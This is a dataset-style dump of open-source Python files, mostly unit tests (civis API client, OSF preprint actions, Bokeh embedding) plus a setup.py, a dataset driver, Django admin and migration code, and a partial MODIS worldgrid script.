text
stringlengths 4
1.02M
| meta
dict |
---|---|
from unittest import mock
import civis
from civis.resources import API_SPEC
import pytest
@pytest.mark.parametrize('schema_tablename', [
'foo.bar', '"foo".bar', 'foo."bar"', '"foo"."bar"'
])
def test_get_table_id(schema_tablename):
"""Check that get_table_id handles quoted schema.tablename correctly."""
client = civis.APIClient(local_api_spec=API_SPEC, api_key='none')
client.get_database_id = mock.Mock(return_value=123)
mock_tables = mock.MagicMock()
mock_tables.__getitem__.side_effect = {0: mock.Mock()}.__getitem__
client.tables.list = mock.Mock(return_value=mock_tables)
client.get_table_id(table=schema_tablename, database=123)
client.tables.list.assert_called_once_with(
database_id=123,
schema='foo',
name='bar'
)
def test_get_storage_host_id():
client = civis.APIClient(local_api_spec=API_SPEC, api_key='none')
class StorageHost:
def __init__(self, id, name):
self.id = id
self.name = name
def __getitem__(self, key):
return getattr(self, key)
storage_hosts = [StorageHost(1234, 'test'), StorageHost(5678, 'othertest')]
client.storage_hosts.list = mock.Mock(return_value=storage_hosts)
assert client.get_storage_host_id('test') == 1234
client.storage_hosts.list.assert_called_once_with()
assert client.get_storage_host_id(4732) == 4732
with pytest.raises(ValueError, match="Storage Host invalidname not found"):
client.get_storage_host_id('invalidname')
| {
"content_hash": "cdd2bbc45c85c12c61cd040c9ff9a3a2",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 79,
"avg_line_length": 30.15686274509804,
"alnum_prop": 0.6599479843953185,
"repo_name": "civisanalytics/civis-python",
"id": "8dd543ef1cb2fef0e6af808b7ca3a7cdb3e5cda6",
"size": "1538",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "civis/tests/test_civis.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "579221"
}
],
"symlink_target": ""
} |
import pytest
from api.base.settings.defaults import API_BASE
from api.providers.permissions import GroupHelper
from osf_tests.factories import (
AuthUserFactory,
)
from osf.utils import permissions as osf_permissions
from api_tests.reviews.mixins.filter_mixins import ReviewActionFilterMixin
from api_tests.reviews.mixins.comment_settings import ReviewActionCommentSettingsMixin
@pytest.mark.enable_quickfiles_creation
class TestPreprintActionFilters(ReviewActionFilterMixin):
@pytest.fixture()
def preprint(self, all_actions):
return all_actions[0].target
@pytest.fixture(params=[True, False], ids=['moderator', 'node_admin'])
def user(self, request, preprint):
user = AuthUserFactory()
if request.param:
user.groups.add(
GroupHelper(
preprint.provider
).get_group('moderator'))
else:
preprint.node.add_contributor(
user,
permissions=[
osf_permissions.READ,
osf_permissions.WRITE,
osf_permissions.ADMIN])
return user
@pytest.fixture()
def expected_actions(self, preprint, all_actions):
return [r for r in all_actions if r.target_id == preprint.id]
@pytest.fixture()
def url(self, preprint):
return '/{}preprints/{}/review_actions/'.format(API_BASE, preprint._id)
def test_unauthorized_user(self, app, url):
res = app.get(url, expect_errors=True)
assert res.status_code == 401
user = AuthUserFactory()
res = app.get(url, auth=user.auth, expect_errors=True)
assert res.status_code == 403
@pytest.mark.enable_quickfiles_creation
class TestReviewActionSettings(ReviewActionCommentSettingsMixin):
@pytest.fixture()
def url(self, preprint):
return '/{}preprints/{}/review_actions/'.format(API_BASE, preprint._id)
| {
"content_hash": "5dc69205df985e75968e91c6da40decf",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 86,
"avg_line_length": 32.898305084745765,
"alnum_prop": 0.6548171045852653,
"repo_name": "sloria/osf.io",
"id": "d96b71a623569bb37d09c076db6e1ac4cee111d0",
"size": "1941",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "api_tests/preprints/views/test_preprint_actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109070"
},
{
"name": "Dockerfile",
"bytes": "8455"
},
{
"name": "HTML",
"bytes": "263083"
},
{
"name": "JavaScript",
"bytes": "1856674"
},
{
"name": "Mako",
"bytes": "690812"
},
{
"name": "Python",
"bytes": "8397175"
},
{
"name": "VCL",
"bytes": "13885"
}
],
"symlink_target": ""
} |
import re
import ast
from setuptools import setup, find_packages
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('withings_cli/cli.py', 'rb') as f:
__version__ = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name="withings-cli",
author="Kim Blomqvist",
author_email="[email protected]",
version=__version__,
description="A Command-line interface for Withings API",
keywords=["withings", "cli-utilities"],
license="MIT",
packages=find_packages(),
include_package_data=True,
install_requires=[
"click",
"pytoml",
"requests_oauthlib",
],
entry_points='''
[console_scripts]
withings=withings_cli.cli:cli
''',
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
],
url="https://github.com/kblomqvist/withings-cli",
download_url="https://github.com/kblomqvist/withings-cli/tarball/" + __version__,
)
| {
"content_hash": "f05daf3e1ba0d032c2b02fa57baaa5f1",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 85,
"avg_line_length": 29.18918918918919,
"alnum_prop": 0.6092592592592593,
"repo_name": "kblomqvist/withings-cli",
"id": "4302555384571f2ddbe3be15a3ea8c5d6bbee461",
"size": "1080",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8245"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import mock
import unittest
import bs4
import bokeh.embed as embed
from bokeh.plotting import figure, curdoc
from bokeh.resources import CDN, JSResources, CSSResources
from bokeh.util.string import encode_utf8
from jinja2 import Template
from six import string_types
_embed_test_plot = None
def setUpModule():
global _embed_test_plot
_embed_test_plot = figure()
_embed_test_plot.circle([1, 2], [2, 3])
def _stable_id():
return 'ID'
def test_components_return_type():
plot1 = figure()
plot2 = figure()
# This is a testing artefact, users dont' have to do this in practice
curdoc().add_root(plot1)
curdoc().add_root(plot2)
r = embed.components(plot1)
assert len(r) == 2
_, divs = embed.components((plot1, plot2))
assert isinstance(divs, tuple)
_, divs = embed.components([plot1, plot2])
assert isinstance(divs, tuple)
_, divs = embed.components({"Plot 1": plot1, "Plot 2": plot2})
assert isinstance(divs, dict)
assert all(isinstance(x, string_types) for x in divs.keys())
@mock.patch('bokeh.embed.make_id', new_callable=lambda: _stable_id)
def test_plot_dict_returned_when_wrap_plot_info_is_false(mock_make_id):
plot1 = figure()
plot2 = figure()
# This is a testing artefact, users dont' have to do this in practice
curdoc().add_root(plot1)
curdoc().add_root(plot2)
expected_plotdict_1 = {"modelid": plot1.ref["id"], "elementid": "ID", "docid": "ID"}
expected_plotdict_2 = {"modelid": plot2.ref["id"], "elementid": "ID", "docid": "ID"}
_, plotdict = embed.components(plot1, wrap_plot_info=False)
assert plotdict == expected_plotdict_1
_, plotids = embed.components((plot1, plot2), wrap_plot_info=False)
assert plotids == (expected_plotdict_1, expected_plotdict_2)
_, plotiddict = embed.components({'p1': plot1, 'p2': plot2}, wrap_plot_info=False)
assert plotiddict == {'p1': expected_plotdict_1, 'p2': expected_plotdict_2}
class TestComponents(unittest.TestCase):
def test_result_attrs(self):
script, div = embed.components(_embed_test_plot)
html = bs4.BeautifulSoup(script, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
self.assertTrue(scripts[0].attrs, {'type': 'text/javascript'})
def test_div_attrs(self):
script, div = embed.components(_embed_test_plot)
html = bs4.BeautifulSoup(div, "lxml")
divs = html.findAll(name='div')
self.assertEqual(len(divs), 2)
div = divs[0]
self.assertEqual(set(div.attrs), set(['class']))
self.assertEqual(div.attrs['class'], ['bk-root'])
self.assertEqual(div.text, '\n\n')
div = divs[1]
self.assertEqual(set(div.attrs), set(['id', 'class']))
self.assertEqual(div.attrs['class'], ['bk-plotdiv'])
self.assertEqual(div.text, '')
def test_script_is_utf8_encoded(self):
script, div = embed.components(_embed_test_plot)
self.assertTrue(isinstance(script, str))
@mock.patch('bokeh.embed.make_id', new_callable=lambda: _stable_id)
def test_output_is_without_script_tag_when_wrap_script_is_false(self, mock_make_id):
script, div = embed.components(_embed_test_plot)
html = bs4.BeautifulSoup(script, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
script_content = scripts[0].getText()
rawscript, div = embed.components(_embed_test_plot, wrap_script=False)
self.maxDiff = None
self.assertEqual(rawscript.strip(), script_content.strip())
class TestNotebookDiv(unittest.TestCase):
def test_return_type(self):
r = embed.notebook_div(_embed_test_plot)
self.assertTrue(isinstance(r, str))
def test_result_attrs(self):
r = embed.notebook_div(_embed_test_plot)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
self.assertTrue(scripts[0].attrs, {'type': 'text/javascript'})
def test_div_attrs(self):
r = embed.notebook_div(_embed_test_plot)
html = bs4.BeautifulSoup(r, "lxml")
divs = html.findAll(name='div')
self.assertEqual(len(divs), 2)
div = divs[0]
self.assertEqual(set(div.attrs), set(['class']))
self.assertEqual(div.attrs['class'], ['bk-root'])
self.assertEqual(div.text, '\n\n')
div = divs[1]
self.assertEqual(set(div.attrs), set(['id', 'class']))
self.assertEqual(div.attrs['class'], ['bk-plotdiv'])
self.assertEqual(div.text, '')
class TestFileHTML(unittest.TestCase):
def test_return_type(self):
class fake_template:
def __init__(self, tester, user_template_variables=None):
self.tester = tester
self.template_variables = {
"title",
"bokeh_js",
"bokeh_css",
"plot_script",
"plot_div"
}
if user_template_variables is not None:
self.template_variables.update(user_template_variables)
def render(self, template_variables):
self.tester.assertTrue(
self.template_variables.issubset(
set(template_variables.keys())
)
)
return "template result"
r = embed.file_html(_embed_test_plot, CDN, "title")
self.assertTrue(isinstance(r, str))
r = embed.file_html(_embed_test_plot, CDN, "title", fake_template(self))
self.assertTrue(isinstance(r, str))
r = embed.file_html(_embed_test_plot, CDN, "title",
fake_template(self, {"test_var"}),
{"test_var": "test"})
self.assertTrue(isinstance(r, str))
def test_file_html_handles_js_only_resources():
js_resources = JSResources(mode="relative", components=["bokeh"])
template = Template("<head>{{ bokeh_js }}</head><body></body>")
output = embed.file_html(_embed_test_plot, (js_resources, None), "title", template=template)
html = encode_utf8("<head>%s</head><body></body>" % js_resources.render_js())
assert output == html
@mock.patch('bokeh.embed.warn')
def test_file_html_provides_warning_if_no_css(mock_warn):
js_resources = JSResources()
embed.file_html(_embed_test_plot, (js_resources, None), "title")
mock_warn.assert_called_once_with(
'No Bokeh CSS Resources provided to template. If required you will need to provide them manually.'
)
def test_file_html_handles_css_only_resources():
css_resources = CSSResources(mode="relative", components=["bokeh"])
template = Template("<head>{{ bokeh_css }}</head><body></body>")
output = embed.file_html(_embed_test_plot, (None, css_resources), "title", template=template)
html = encode_utf8("<head>%s</head><body></body>" % css_resources.render_css())
assert output == html
@mock.patch('bokeh.embed.warn')
def test_file_html_provides_warning_if_no_js(mock_warn):
css_resources = CSSResources()
embed.file_html(_embed_test_plot, (None, css_resources), "title")
mock_warn.assert_called_once_with(
'No Bokeh JS Resources provided to template. If required you will need to provide them manually.'
)
def test_file_html_title_is_escaped():
r = embed.file_html(_embed_test_plot, CDN, "&<")
assert "<title>&<</title>" in r
class TestAutoloadStatic(unittest.TestCase):
def test_return_type(self):
r = embed.autoload_static(_embed_test_plot, CDN, "some/path")
self.assertEqual(len(r), 2)
@mock.patch('bokeh.embed.make_id', new_callable=lambda: _stable_id)
def test_script_attrs(self, mock_make_id):
js, tag = embed.autoload_static(_embed_test_plot, CDN, "some/path")
html = bs4.BeautifulSoup(tag, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set(['src',
'data-bokeh-model-id',
'id',
'data-bokeh-doc-id']))
self.assertEqual(attrs['data-bokeh-doc-id'], 'ID')
self.assertEqual(attrs['data-bokeh-model-id'], str(_embed_test_plot._id))
self.assertEqual(attrs['src'], 'some/path')
class TestConnectSessionOrDocument(unittest.TestCase):
def test_invalid_resources_param(self):
with self.assertRaises(ValueError):
embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources=123)
with self.assertRaises(ValueError):
embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources="whatever")
def test_resources_default_is_implicit(self):
r = embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources="default")
self.assertFalse('resources=' in r)
def test_resources_none(self):
r = embed._connect_session_or_document(url="http://localhost:8081/foo/bar/sliders", resources=None)
self.assertTrue('resources=none' in r)
class TestServerDocument(unittest.TestCase):
def test_ensure_no_session_do_model(self):
r = embed.server_document(url="http://localhost:8081/foo/bar/sliders")
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
self.assertTrue('bokeh-absolute-url=http://localhost:8081/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders&bokeh-absolute-url=%s" % \
("http://localhost:8081/foo/bar/sliders", divid, "http://localhost:8081/foo/bar/sliders")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
class TestServerSession(unittest.TestCase):
def test_model_and_session_both_required(self):
with self.assertRaises(TypeError):
embed.server_session()
with self.assertRaises(TypeError):
embed.server_session(_embed_test_plot)
with self.assertRaises(TypeError):
embed.server_session(session_id='fakesession')
def test_ensure_session_and_model(self):
r = embed.server_session(_embed_test_plot, session_id='fakesession')
self.assertTrue('bokeh-session-id=fakesession' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s&bokeh-session-id=fakesession" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : str(_embed_test_plot._id),
'id' : divid,
'src' : src },
attrs)
class TestAutoloadServer(unittest.TestCase):
def test_return_type(self):
r = embed.autoload_server(_embed_test_plot, session_id='fakesession')
self.assertTrue(isinstance(r, str))
def test_script_attrs_session_id_provided(self):
r = embed.autoload_server(_embed_test_plot, session_id='fakesession')
self.assertTrue('bokeh-session-id=fakesession' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s&bokeh-session-id=fakesession" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : str(_embed_test_plot._id),
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_no_session_id_provided(self):
r = embed.autoload_server(None)
self.assertFalse('bokeh-session-id' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_url_provided(self):
r = embed.autoload_server(url="http://localhost:8081/foo/bar/sliders", relative_urls=True)
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders" % \
("http://localhost:8081/foo/bar/sliders", divid)
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_url_provided_absolute_resources(self):
r = embed.autoload_server(url="http://localhost:8081/foo/bar/sliders")
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
self.assertTrue('bokeh-absolute-url=http://localhost:8081/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders&bokeh-absolute-url=%s" % \
("http://localhost:8081/foo/bar/sliders", divid, "http://localhost:8081/foo/bar/sliders")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_url_and_app_path_provided(self):
for path in ("/foo/bar/sliders", "/foo/bar/sliders/", "foo/bar/sliders", "foo/bar/sliders"):
r = embed.autoload_server(url="http://localhost:8081", app_path=path, relative_urls=True)
self.assertTrue('bokeh-app-path=/foo/bar/sliders' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-app-path=/foo/bar/sliders" % \
("http://localhost:8081/foo/bar/sliders", divid)
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
def test_script_attrs_arguments_provided(self):
r = embed.server_document(arguments=dict(foo=10))
self.assertTrue('foo=10' in r)
html = bs4.BeautifulSoup(r, "lxml")
scripts = html.findAll(name='script')
self.assertEqual(len(scripts), 1)
attrs = scripts[0].attrs
self.assertTrue(set(attrs), set([
'src',
'data-bokeh-doc-id',
'data-bokeh-model-id',
'id'
]))
divid = attrs['id']
src = "%s/autoload.js?bokeh-autoload-element=%s&bokeh-absolute-url=%s&foo=10" % \
("http://localhost:5006", divid, "http://localhost:5006")
self.assertDictEqual({ 'data-bokeh-doc-id' : '',
'data-bokeh-model-id' : '',
'id' : divid,
'src' : src },
attrs)
@mock.patch('bokeh.document.check_integrity')
def test_modelindocument_validates_document_by_default(check_integrity):
p = figure()
with embed._ModelInDocument([p]):
pass
assert check_integrity.called
@mock.patch('bokeh.document.check_integrity')
def test_modelindocument_doesnt_validate_doc_due_to_env_var(check_integrity, monkeypatch):
monkeypatch.setenv("BOKEH_VALIDATE_DOC", "false")
p = figure()
with embed._ModelInDocument([p]):
pass
assert not check_integrity.called
@mock.patch('bokeh.document.check_integrity')
def test_modelinemptydocument_validates_document_by_default(check_integrity):
p = figure()
with embed._ModelInEmptyDocument(p):
pass
assert check_integrity.called
@mock.patch('bokeh.document.check_integrity')
def test_modelinemptydocument_doesnt_validate_document_due_to_env_var(check_integrity, monkeypatch):
monkeypatch.setenv("BOKEH_VALIDATE_DOC", "false")
p = figure()
with embed._ModelInEmptyDocument(p):
pass
assert not check_integrity.called
| {
"content_hash": "a370ff6e913b59647e3c6d8fc25660a1",
"timestamp": "",
"source": "github",
"line_count": 485,
"max_line_length": 114,
"avg_line_length": 39.315463917525776,
"alnum_prop": 0.580029368575624,
"repo_name": "DuCorey/bokeh",
"id": "9cec1d48344f9b8ebd76649e2b9caed0d2246dca",
"size": "19068",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "bokeh/tests/test_embed.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1442"
},
{
"name": "CSS",
"bytes": "115718"
},
{
"name": "CoffeeScript",
"bytes": "1220250"
},
{
"name": "HTML",
"bytes": "48421"
},
{
"name": "JavaScript",
"bytes": "53886"
},
{
"name": "Makefile",
"bytes": "1150"
},
{
"name": "Python",
"bytes": "2216674"
},
{
"name": "Shell",
"bytes": "8660"
},
{
"name": "TypeScript",
"bytes": "209616"
}
],
"symlink_target": ""
} |
"""
@package mi.dataset.driver.adcps_jln.stc.driver
@file marine-integrations/mi/dataset/driver/adcps_jln/stc/driver.py
@author Maria Lutz
@brief Driver for the adcps_jln_stc
Release notes: Release 0.0.3 Driver modified to incorporate the
recovered data using ADCPS JLN parser to parse bindary PD0 files
modifications done by Jeff Roy [email protected]
Initial Release
"""
__author__ = 'Maria Lutz'
__license__ = 'Apache 2.0'
from mi.core.common import BaseEnum
from mi.core.log import get_logger
log = get_logger()
from mi.core.exceptions import ConfigurationException
from mi.dataset.dataset_driver import MultipleHarvesterDataSetDriver, DataSetDriverConfigKeys
from mi.dataset.parser.adcps_jln_stc import AdcpsJlnStcParser, AdcpsJlnStcInstrumentParserDataParticle
from mi.dataset.parser.adcps_jln_stc import AdcpsJlnStcMetadataParserDataParticle
from mi.dataset.harvester import SingleDirectoryHarvester
from mi.dataset.parser.adcp_pd0 import AdcpPd0Parser
from mi.dataset.parser.adcps_jln import \
AdcpsJlnParticle
class DataTypeKey(BaseEnum):
ADCPS_JLN_STC = 'adcps_jln_stc'
ADCPS_JLN = 'adcps_jln'
class AdcpsJlnStcDataSetDriver(MultipleHarvesterDataSetDriver):
def __init__(self, config, memento, data_callback, state_callback,
event_callback, exception_callback):
data_keys = DataTypeKey.list()
super(AdcpsJlnStcDataSetDriver, self).__init__(config, memento, data_callback,
state_callback, event_callback,
exception_callback, data_keys)
@classmethod
def stream_config(cls):
return [AdcpsJlnStcInstrumentParserDataParticle.type(),
AdcpsJlnStcMetadataParserDataParticle.type(),
AdcpsJlnParticle.type()]
def _build_parser(self, parser_state, file_handle, data_key=None):
# configure the parser based on the data_key
if data_key == DataTypeKey.ADCPS_JLN_STC:
config = self._parser_config.get(data_key)
config.update({
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln_stc',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'AdcpsJlnStcInstrumentParserDataParticle'
})
parser = AdcpsJlnStcParser(config, parser_state, file_handle,
lambda state, ingested:
self._save_parser_state(state, data_key, ingested),
self._data_callback, self._sample_exception_callback)
elif data_key == DataTypeKey.ADCPS_JLN:
config = self._parser_config.get(data_key)
config.update({
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'AdcpsJlnParticle'
})
parser = AdcpPd0Parser(config, parser_state, file_handle,
lambda state, ingested:
self._save_parser_state(state, data_key, ingested),
self._data_callback, self._sample_exception_callback)
else: # if we don't get a valid data_key raise exception
log.warn('Parser got bad configuration DataTypeKey')
raise ConfigurationException
return parser
def _build_harvester(self, driver_state):
"""
Build and return the harvester
"""
harvesters = []
instrument_harvester = self.build_single_harvester(
driver_state,
DataTypeKey.ADCPS_JLN_STC)
if instrument_harvester is not None:
harvesters.append(instrument_harvester)
recovered_harvester = self.build_single_harvester(
driver_state,
DataTypeKey.ADCPS_JLN)
if recovered_harvester is not None:
harvesters.append(recovered_harvester)
return harvesters
def build_single_harvester(self, driver_state, key):
if key in self._harvester_config:
harvester = SingleDirectoryHarvester(
self._harvester_config.get(key),
driver_state[key],
lambda filename: self._new_file_callback(filename, key),
lambda modified: self._modified_file_callback(modified, key),
self._exception_callback)
else:
harvester = None
return harvester
| {
"content_hash": "415f407096ec34c93ae26fc4a90941b6",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 102,
"avg_line_length": 39.134453781512605,
"alnum_prop": 0.6175649559802447,
"repo_name": "ooici/marine-integrations",
"id": "df48423e85f05325ef99d2e50b18a84de6fbbf5d",
"size": "4657",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mi/dataset/driver/adcps_jln/stc/driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "10493022"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import Term, Context, Flashcard, Category, FlashcardAnswer
from proso_models.admin import pretty_date
class TermAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'name')
search_fields = ('identifier', 'name')
list_filter = ('lang',)
class ContextAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'name')
search_fields = ('name', )
list_filter = ('lang',)
class FlashcardAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'term', 'context')
search_fields = ('identifier', 'term__name', 'context__name')
list_filter = ('lang',)
class CategoryAdmin(admin.ModelAdmin):
list_display = ('id', 'identifier', 'lang', 'name')
search_fields = ('name',)
list_filter = ('lang',)
class AnswerAdmin(admin.ModelAdmin):
def is_correct(self, a):
return a.item_answered == a.item_asked
is_correct.short_description = 'Correct'
is_correct.boolean = True
def asked_ago(self, a):
return pretty_date(a.time)
asked_ago.short_description = 'When Asked'
def options_count(self, a):
return a.options.count()
def context_wrapped(self, a):
return str(a.context).replace(',', ', ')
context_wrapped.short_description = 'Context'
list_display = (
'user',
'item_asked',
'item_answered',
'context_wrapped',
'is_correct',
'options_count',
'type',
'time',
'asked_ago',
)
raw_id_fields = (
'config',
'context',
'item',
'item_answered',
'item_asked',
'metainfo',
'options',
'practice_set',
'session',
'user',
)
search_fields = ('user__username',)
admin.site.register(Term, TermAdmin)
admin.site.register(Context, ContextAdmin)
admin.site.register(Flashcard, FlashcardAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.register(FlashcardAnswer, AnswerAdmin)
| {
"content_hash": "dfc21f3fe4cc18a141834278d83d2e1d",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 71,
"avg_line_length": 26.08974358974359,
"alnum_prop": 0.6103194103194103,
"repo_name": "adaptive-learning/proso-apps",
"id": "ebfca961a07ac8179b6780506fe39f8e7e05aa88",
"size": "2035",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "proso_flashcards/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4739"
},
{
"name": "HTML",
"bytes": "35781"
},
{
"name": "JavaScript",
"bytes": "865"
},
{
"name": "Makefile",
"bytes": "4125"
},
{
"name": "Python",
"bytes": "645104"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('imager_profile', '0004_auto_20170119_1916'),
]
operations = [
migrations.AlterField(
model_name='imagerprofile',
name='address',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='imagerprofile',
name='camera_type',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='imagerprofile',
name='personal_website',
field=models.URLField(max_length=50),
),
]
| {
"content_hash": "d2eca126098835e1df0bd10a8e988414",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 73,
"avg_line_length": 27.607142857142858,
"alnum_prop": 0.5808538163001293,
"repo_name": "JSchatzman/django-imager",
"id": "7a84915d71f8d2233b196c54c36b4786e238ffd6",
"size": "846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "imagersite/imager_profile/migrations/0005_auto_20170202_0024.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8947"
},
{
"name": "HTML",
"bytes": "9148"
},
{
"name": "JavaScript",
"bytes": "1325"
},
{
"name": "Python",
"bytes": "48503"
}
],
"symlink_target": ""
} |
"""
Shows how many fractions are available in the worldgrid for a given tile
Example invocation::
python rastercube/scripts/show_available_fractions.py
--tile=h10v09
--worldgrid=hdfs:///user/terrai/worldgrid/
"""
from __future__ import division
import os
import sys
import argparse
import numpy as np
import rastercube.utils as utils
import rastercube.datasources.modis as modis
import rastercube.jgrid as jgrid
import rastercube.worldgrid.grids as grids
parser = argparse.ArgumentParser(description='Create NDVI/QA jgrids from HDF')
parser.add_argument('--tile', type=str, required=True,
help='tile name (e.g. h17v07, all)')
parser.add_argument('--worldgrid', type=str, required=True,
help='worldgrid root')
if __name__ == '__main__':
args = parser.parse_args()
arg_tilename = args.tile
modis_dir = utils.get_modis_hdf_dir()
worldgrid = args.worldgrid
ndvi_root = os.path.join(worldgrid, 'ndvi')
qa_root = os.path.join(worldgrid, 'qa')
assert jgrid.Header.exists(ndvi_root)
print 'Reading HDF headers...'
ndvi_header = jgrid.load(ndvi_root)
qa_header = jgrid.load(qa_root)
assert np.all(ndvi_header.timestamps_ms == qa_header.timestamps_ms)
if arg_tilename == 'all':
import rastercube.config as config
tiles = config.MODIS_TERRA_TILES
else:
tiles = [arg_tilename]
print 'Starting...'
for tilename in tiles:
print tilename, ':',
sys.stdout.flush()
# -- Find the filename of the HDF file for this date and our tile
print 'Finding files...',
sys.stdout.flush()
hdf_files = modis.ndvi_hdf_for_tile(tilename, modis_dir)
hdf_files = {ts: fname for (fname, ts) in hdf_files}
# -- Figure out the fractions we have to update
modgrid = grids.MODISGrid()
tile_h, tile_v = modis.parse_tilename(tilename)
print 'Finding fractions...',
sys.stdout.flush()
fractions = modgrid.get_cells_for_tile(tile_h, tile_v)
